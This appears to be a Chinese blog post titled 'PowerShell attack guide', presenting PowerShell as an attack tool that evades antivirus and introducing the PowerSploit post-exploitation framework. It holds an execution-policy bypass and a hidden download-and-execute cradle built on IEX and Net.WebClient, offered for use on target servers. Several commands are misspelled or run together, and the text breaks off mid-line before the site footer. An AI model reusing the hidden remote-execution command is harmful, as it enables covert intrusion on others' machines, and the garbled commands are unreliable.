PowerShell攻击指南
2021/8/15 7:06:13
本文主要是介绍PowerShell攻击指南,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
PowerShell攻击指南
PowerShell
1、介绍
powershell需要.NET环境的支持,同时支持.NET对象,其可读性易用性居所有shell之首。
- 脚本可以在内存中执行,不需要写入磁盘。
- 几乎不会触发杀毒软件
- 可以远程执行
- 目前很多工具都是基于powershell开发的
- 使很多windows脚本的执行变得更容易
- cmd.exe的运行通常会被阻止,但是power shell的运行通常不会被阻止
- 可用于管理活动目录
输入Get-Host 或者 $PSVersionTable.PSVERSION 查看powershell的版本
PS C:\Users\DELL> Get-Host Name : ConsoleHost Version : 5.1.18362.1171 InstanceId : a9795f0c-814a-4e0e-95ea-b29b3a2fbbfc UI : System.Management.Automation.Internal.Host.InternalHostUserInterface CurrentCulture : zh-CN CurrentUICulture : zh-CN PrivateData : Microsoft.PowerShell.ConsoleHost+ConsoleColorProxy DebuggerEnabled : True IsRunspacePushed : False Runspace : System.Management.Automation.Runspaces.LocalRunspace PS C:\Users\DELL> $PSVersionTable.PSVERSION Major Minor Build Revision ----- ----- ----- -------- 5 1 18362 1171
2、基本概念
1、.ps1文件
一个powershell脚本其实是一个简单的文本文件,其扩展名为 .ps1 。每个脚本文件包含一系列的powershell命令,每个命令显示为独立的一行。
2、执行策略
为了防止使用者运行恶意脚本,powershell提供了一个执行策略。在默认情况下,这个 策略被设置为不能运行。如果脚本不能运行可以执行下面的命令查询当前的执行策略
Get-ExwcutionPolicy
Restrcted 脚本不能运行(默认设置)
RemoteSigned 在本地创建的脚本可以运行,但从网上下载的脚本不能运行(拥有数字证书的签名的除外)
AllSigned 仅当脚本由受信任的发布者签名时才能运行
Unrestricted 允许所有脚本运行
可用下面的cmdlet命令设置powershell的执行策略
Set-ExecutionPolicy <policy name>
3、运行脚本
必须输入完整的路径和文件名
4、管道
将一个命令的输出作为另一个命令的输入
get-process p* | stop-process
3、常用命令
新建目录
New-Item test -type Directory
新建文件
New-Item test.txt -type File
删除目录或文件
Remove-Item test
显示文本内容
get-content test.txt
设置文本内容
set-content 1.txt -value "hell,word!"
追加内容
Add-Content 1.txt -Value "i love you"
清除内容
Clear-Content test.txt
上传test.psl至目标服务器,在CMD环境下,在目标服务器本地执行该脚本。
powerShell.exe -Executionpolicy Bypass -File test.psl
从远程服务器下载脚本,绕过本地权限并隐藏执行
powerShell.exe -Executionpolicy Bypass-WindowStyle Hidden-NoProfile-NonI IEX(New-ObjectNet.webClient).DownloadString("test.psl");[Parameters]
powersploit
1、概念及其调用
一款基于powershell的后渗透框架软件,包含很多power shell攻击脚本。主要用于信息侦察、权限维持、权限提升
Kali Linux 系统内置了 Powersploit,安装在 /usr/share/windows-resources/powersploit
目录下,可以通过 ls
命令看到各种脚本类型
┌──(root
这篇关于PowerShell攻击指南的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2022-09-14SharePoint 2019 用 PowerShell将启用发布功能站点网站集另存为模板
- 2022-08-30PowerShell教程 - 程序性能和BUG分析工具
- 2022-08-30PowerShell教程 - 模块管理(Modules Management)
- 2022-08-29PowerShell教程 - Web requests(Web请求)
- 2022-08-26PowerShell教程 - 日期时间管理(Date & Time Management)
- 2022-08-25PowerShell教程 - 磁盘与硬件管理(Disk & Hardware Management)
- 2022-08-25PowerShell教程 - 系统事件管理(System Event Management)
- 2022-08-25PowerShell教程 - 文件系统管理(File System Management)
- 2022-08-24PowerShell教程 - 网络管理(Network Management)
- 2022-08-24PowerShell